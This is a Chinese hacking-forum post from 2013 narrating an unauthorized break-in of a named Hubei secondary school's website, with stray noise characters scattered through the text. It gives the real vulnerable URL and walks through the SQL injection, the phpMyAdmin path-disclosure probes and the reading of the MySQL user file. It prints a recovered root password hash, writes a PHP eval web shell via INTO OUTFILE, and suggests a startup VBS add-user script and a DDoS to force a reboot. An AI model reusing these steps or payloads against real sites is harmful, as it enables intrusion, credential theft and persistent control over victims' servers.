找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2680|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏8 C, @9 A* @+ U4 a. p
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!$ P9 v! l1 X4 r4 [& v. U

% `$ {' |5 B' i" v3 j/ b1 S1 `$ ]0 F

9 ^9 ^3 i2 r8 h/ R7 r  t常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 5 V- w$ h- H. q* R- j+ A+ [

8 u& s8 \; }1 ^4 P; D& g. z那么想可以直接写入shell ,getshell有几个条件:
" ?- L  X/ n0 w
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
+ G5 w+ B+ ]0 E
7 Y$ `8 R1 V( `+ A+ \试着爆绝对路径:, `2 `: X! _3 ^& l0 M  d
1./phpMyAdmin/index.php?lang[]=1  
1 G( _, M* A3 z6 m2./phpMyAdmin/phpinfo.php  - s1 z+ O+ U, X4 d% y
3./load_file()  
( V* l7 h. `# e* N4./phpmyadmin/themes/darkblue_orange/layout.inc.php  5 T5 o: }. y( y5 N$ O+ b, S9 M
5./phpmyadmin/libraries/select_lang.lib.php  
5 J5 ?* ?, C2 |* g4 \; F- H6./phpmyadmin/libraries/lect_lang.lib.php  
$ K  m' H6 h1 [- d: N; e9 \- Y7./phpmyadmin/libraries/mcrypt.lib.php   
6 L. [: _* X  r5 H( }# m- V: |8./phpmyadmin/libraries/export/xls.php  
  c' w, \2 s5 C; G& P% x% I( \8 _. ^% O( S
均不行...........................
( Z. f% u6 w: a  }& u$ G7 @
8 q- u6 X/ {6 u% P1 _御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php$ ?: X1 f4 \; ?7 l/ a; ~
4 A# t/ b1 v& V7 b$ n% ^7 U
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 5 x4 p+ w! E3 ~$ @: g( }: Z
6 Z; W) |2 H* r7 B
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败6 F% d" \$ i: @' `

9 H3 \% k/ R' d1 a敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
- J- x5 i. ?) y& i/ O
, t* O* r' A2 O; e) t1 Q. h想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ( k5 U2 [) Q8 w6 X

& m2 n/ C9 P1 R0 }. w/ E) A, A! ahttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini - S& X9 W  h) s0 E, O5 W- f
" b5 @: @; r- N- `4 ]9 {
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
7 ~, x2 r( r: |8 p) t7 }4 [8 e. ~: F/ j
成功读到root密码:
7 |6 m# u' J. q! y
5 x# S7 z+ W: f3 a17---- r(0072)' ~: F9 C( i7 M, L
18---- o(006f)
# N& r- W7 n( @9 \19---- o(006f)
4 [1 d: }1 \# g* T20---- t(0074)
$ B' `3 K8 [; g2 E4 x21---- *(002a)8 ~! V; s9 C( q& n
22---- 8(0038)4 t* }% a* Z4 \2 [6 f! P
23---- 2(0032)2 B) R) L8 g4 U, G6 m
24---- E(0045)
& M; L7 R, \4 D! [" K) I25---- 1(0031)
! {6 f/ j0 h' Z9 L26---- C(0043)
2 J8 b) C& k5 p' L27---- 5(0035)
, P3 Y0 s+ B  z0 k# Q) ^& t# |28---- 8(0038)4 a0 l4 |! G) `8 y, ?3 I2 X; B: k
29---- 2(0032)
0 Y. X8 k/ c& h" T: o$ Q30---- 8(0038)1 S: [* s, y2 O  U+ ^3 ?
31---- A(0041)
0 v3 m* I+ G  o/ C- _+ ~32---- 9(0039)8 P  O3 j5 w: q' d
33---- B(0042)% [% @: H0 Z$ ?" H. k$ F
34---- 5(0035)5 W1 z* {, w7 `! H  j
35---- 4(0034)
# C6 t5 L% e, L6 Z- T$ {36---- 8(0038)
$ G3 k: i0 V4 B# w37---- 6(0036)
4 e/ m/ T9 Z- P$ }; z38---- 4(0034)
$ h  P% q' I6 y5 o5 w  w39---- 9(0039)* h; x1 k# q2 ^0 b
40---- 1(0031)
8 M8 O( J( v' ~1 p# \0 e41---- 1(0031)( \& m& `: I, H7 d1 J9 S# p+ A
42---- 5(0035)2 l' I  m2 v7 s4 F
43---- 3(0033)
' J. z) w! b, Q3 A8 D. [/ }% d44---- 5(0035)
' C0 m8 u) [6 _+ O7 l' b) v( _45---- 9(0039)
4 r' l8 d! a" j6 N: S1 X! V6 o% i46---- 8(0038)0 I* S; p) m' m+ r2 h
47---- F(0046)9 j% Z( g) B0 @# N- K' ^
48---- F(0046): a! K: ], k! m7 J6 I* P
49---- 4(0034)4 h$ O! a7 q6 i
50---- F(0046)
6 T' `! v& f: A( N$ s51---- 0(0030): V9 b2 i$ e" ?4 ~* l; @1 N
52---- 3(0033)
2 q3 U0 T  u6 ?1 Y& w53---- 2(0032). F7 M/ {- ^2 S* t( C
54---- A(0041)
, |* X: R# K8 {% g: `8 D55---- 4(0034)
6 w# r8 `/ o7 _7 p" w! ?56---- A(0041)
4 t3 U, V5 w' V' S57---- B(0042)
, j8 A' z# L) N! X3 F. T58---- *(0044). f2 v5 D8 k+ H* P
59---- *(0035)8 u) G) P2 {% X1 g' Y! y5 U9 T( Y
60---- *(0041)
4 x! S: R9 n1 b' }" l61---- *0032)
1 l4 K* |1 C% U& e; T) m) k5 p! }- D2 K9 }
解密后成功登陆phpmyamin9 U6 y/ U; O7 t4 D/ [$ J9 |
                          
8 V! q% v) R; o) A& L
! e' x1 c" F7 l$ m# I4 |- z: Z1 O                             4 r% {. Q. _9 d
& c1 @; Z6 ~$ Y$ h8 m
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'; }/ Y0 X  I, g8 t! r: Z$ f+ W3 {

7 O7 G/ T$ ]. R" z0 \3 E成功执行,拿下shell,菜刀连接:- {0 @  F- \, E7 E$ j

' s% g, r; X8 g0 B" E# I" x8 j服务器不支持asp,aspx,php提权无果.................../ _% `, Z% x2 o3 ]6 x8 P  [* o- }
8 M' w: \0 {! m1 K. h
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:, {, Y6 e% x/ p# C
服务器上已经有个隐藏帐号了
8 h1 {! Z7 ~& n9 @% o6 {
别名     administrators- ]* I3 b/ I4 k, T3 @
注释     管理员对计算机/域有不受限制的完全访问权
2 H8 Z4 u- t( L1 |: [. j  w
成员
. Z! B: D/ f* }0 A! h
-------------------------------------------------------------------------------$ J  x6 X( h: x; E4 P' ]
admin2 k7 A" v5 c* E8 r% e; {
Administrator
3 I5 P$ w% A+ g" Dslipper$! q% r# X* x- e$ @9 a
sqluser! Z" H9 C; t: `# L! l' J
命令成功完成。
9 p) X' [6 f% ]; e4 y& i
! ]$ v: H5 L! C1 d# _. o+ f5 }服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
. U$ A3 |& i4 T- A
0 x7 n& H$ f- R" A  Z) {" Dddos服务器重启,不然就只能坐等服务器重启了...............................2 M& d0 T! q/ ^2 O/ M
5 x- c- }; W; g" ]6 e$ ~
      

$ {' J4 X0 t9 o/ @

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表